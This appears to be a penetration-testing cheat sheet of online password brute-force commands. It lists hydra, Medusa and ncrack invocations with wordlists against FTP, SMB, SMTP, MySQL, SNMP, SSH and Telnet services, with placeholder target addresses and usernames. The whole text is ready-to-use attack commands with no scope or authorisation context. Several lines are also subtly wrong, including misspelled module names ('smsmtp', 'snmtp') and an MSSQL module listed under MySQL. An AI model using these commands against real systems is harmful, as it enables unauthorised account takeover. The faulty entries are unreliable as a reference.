---------------------- PASSWORD ATTACK ----------------------------------------------------------
---------------------- TESTS PASSWORD -----------------------------------------------------------
---------------------- FTP SERVER ---------------------------------------------------------------

# hydra FTP
hydra -t 1 -V -f -l Anonymous -P /usr/share/wordlists/dirb/small.txt IP_ADDRESS ftp

# Medusa FTP
medusa -h IP_ADDRESS -u Anonymous -P /usr/share/wordlists/dirb/small.txt -M ftp

# ncrack FTP
ncrack -p 21 --user Anonymous -P /usr/share/wordlists/dirb/small.txt IP_ADDRESS

---------------------- SMB SERVER --------------------------------------------------------------

# hydra SMB
hydra -t 1 -V -f -l USERNAME -P /usr/share/wordlists/dirb/small.txt IP_ADDRESS smb

# Medusa SMB
medusa -h IP_ADDRESS -u USERNAME -P /usr/share/wordlists/dirb/small.txt -M smbnt

---------------------- SMTP SERVER -------------------------------------------------------------

# hydra SMTP
hydra -t 1 -V -f -l USERNAME -P /usr/share/wordlists/dirb/small.txt IP_ADDRESS smsmtp

# Medusa SMTP
medusa -h IP_ADDRESS -u USERNAME -P /usr/share/wordlists/dirb/small.txt -M snmtp

---------------------- MYSQL SERVER -------------------------------------------------------------

# hydra MYSQL
hydra -t 1 -V -f -L /usr/share/wordlists/others/names.txt -P /usr/share/wordlists/dirb/small.txt URL mysql

# Medusa MYSQL
medusa -h IP_ADDRESS -u USERNAME -P /usr/share/wordlists/dirb/small.txt -M mssql

---------------------- SNMP SERVER --------------------------------------------------------------

# hydra SNMP
# hydra -P /usr/share/wordlists/dirb/small.txt -v IP_ADDRESS snmp

# Medusa SNMP
medusa -h IP_ADDRESS -u USERNAME -P /usr/share/wordlists/dirb/small.txt -M snmp

---------------------- SSH ---------------------------------------------------------------------
# hydra SSH
hydra -v -V -u -L /usr/share/wordlists/others/names.txt -P /usr/share/wordlists/dirb/small.txt -t 1 -u IP_ADDRESS ssh

# Medusa SSH
medusa -h IP_ADDRESS -u USERNAME -P /usr/share/wordlists/dirb/small.txt -M ssh

# ncrack SSH
ncrack -p 22 --user USERNAME -P passwords.txt IP_ADDRESS -T 5

---------------------- TELNET ------------------------------------------------------------------
# hydra TELNET
hydra -l USERNAME -P /usr/share/wordlists/dirb/small.txt -t 32 IP_ADDRESS telnet

# ncrack TELNET
ncrack -p 23 --user USERNAME -P /usr/share/wordlists/dirb/small.txt IP_ADDRESS -T 5

# Medusa TELNET
medusa -u USERNAME -P /usr/share/wordlists/dirb/small.txt -h IP_ADDRESS -M telnet
